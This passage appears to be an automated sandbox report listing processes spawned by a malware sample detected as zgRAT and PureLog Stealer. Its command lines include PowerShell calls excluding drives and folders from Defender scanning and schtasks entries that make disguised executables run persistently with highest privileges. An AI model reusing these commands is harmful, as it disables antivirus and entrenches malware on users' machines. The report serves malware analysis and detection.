Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 12:07:03
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                        Target ID:5
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:6
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:8
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:10
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:12
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:14
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:17
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:19
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:20
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:21
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:22
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:23
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:24
                                                                                        Start time:12:07:03
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:25
                                                                                        Start time:12:07:05
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:26
                                                                                        Start time:12:07:06
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:27
                                                                                        Start time:12:07:06
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 9 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:28
                                                                                        Start time:12:07:06
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:29
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:30
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Recovery\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Recovery\conhost.exe
                                                                                        Imagebase:0x840000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 71%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:31
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:32
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:33
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:34
                                                                                        Start time:12:07:07
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:35
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:36
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe"
                                                                                        Imagebase:0x6b0000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 71%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:38
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                                                                                        Imagebase:0x440000
                                                                                        File size:3'823'616 bytes
                                                                                        MD5 hash:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 71%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:39
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:40
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:41
                                                                                        Start time:12:07:08
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:42
                                                                                        Start time:12:07:09
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f
                                                                                        Imagebase:0x7ff76f990000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 43
Start time: 12:07:09
Start date: 08/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat"
Imagebase: 0x7ff7f9870000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 12:07:10
Start date: 08/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 12:07:11
Start date: 08/01/2025
Path: C:\Program Files\Google\Chrome\Application\conhost.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\conhost.exe"
Imagebase: 0x770000
File size: 3'823'616 bytes
MD5 hash: 529B29E8BCEF9CC790F7C61F40D44B39
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 71%, ReversingLabs
Has exited: true

Target ID: 46
Start time: 12:07:11
Start date: 08/01/2025
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff64f7b0000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 47
Start time: 12:07:14
Start date: 08/01/2025
Path: C:\Windows\System32\PING.EXE
Wow64 process (32bit): false
Commandline: ping -n 10 localhost
Imagebase: 0x7ff64cd50000
File size: 22'528 bytes
MD5 hash: 2F46799D79D22AC72C241EC0322B011D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 48
Start time: 12:07:15
Start date: 08/01/2025
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff693ab0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 52
Start time: 12:07:24
Start date: 08/01/2025
Path: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
Imagebase: 0x950000
File size: 3'823'616 bytes
MD5 hash: 529B29E8BCEF9CC790F7C61F40D44B39
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 55
Start time: 12:07:29
Start date: 08/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
Imagebase: 0x7ff7f9870000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 56
Start time: 12:07:29
Start date: 08/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 57
Start time: 12:07:29
Start date: 08/01/2025
Path: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
Imagebase: 0x540000
File size: 3'823'616 bytes
MD5 hash: 529B29E8BCEF9CC790F7C61F40D44B39
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 60
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 61
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 62
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
